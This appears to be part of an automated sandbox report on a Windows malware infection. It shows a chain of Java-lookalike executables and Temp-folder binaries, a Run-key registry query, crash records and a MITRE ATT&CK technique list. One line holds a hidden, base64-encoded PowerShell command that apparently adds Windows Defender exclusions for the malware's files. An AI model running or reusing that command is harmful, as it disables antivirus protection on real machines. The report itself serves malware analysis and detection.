        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        27⤵
        
        PID:636
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        28⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        29⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        30⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        31⤵
        
        PID:3184
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        32⤵
        
        PID:4276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        33⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        34⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_platform.exe"
        35⤵
        Modifies registry key
        
        PID:4364

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:1272

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:680

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBtAHAAcAByAEUAZgBFAFIARQBOAGMARQAgAC0ARQBYAEMATAB1AFMAaQBPAE4AUABhAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAQwBlADsAIABhAEQARAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AQwBlACAALQBFAHgAYwBMAFUAcwBJAE8AbgBwAFIATwBDAEUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AcgBjAEUA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4072

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
1⤵
PID:6364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\oIkRrrZKxQv5HKG8.exe
1⤵
PID:7092
- C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\oIkRrrZKxQv5HKG8.exe
  C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\oIkRrrZKxQv5HKG8.exe
  2⤵
  PID:6016
- - C:\Users\Admin\AppData\Local\Temp\7kfQclDy\MtCbCnRc9KvuEoVr.exe
    C:\Users\Admin\AppData\Local\Temp\7kfQclDy\MtCbCnRc9KvuEoVr.exe 6016
    3⤵
    PID:9816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9816 -s 624
      4⤵
      Program crash
      PID:18112

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6272 -ip 6272
1⤵
PID:11516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 9816 -ip 9816
1⤵
PID:18060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7112 -ip 7112
1⤵
PID:24308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion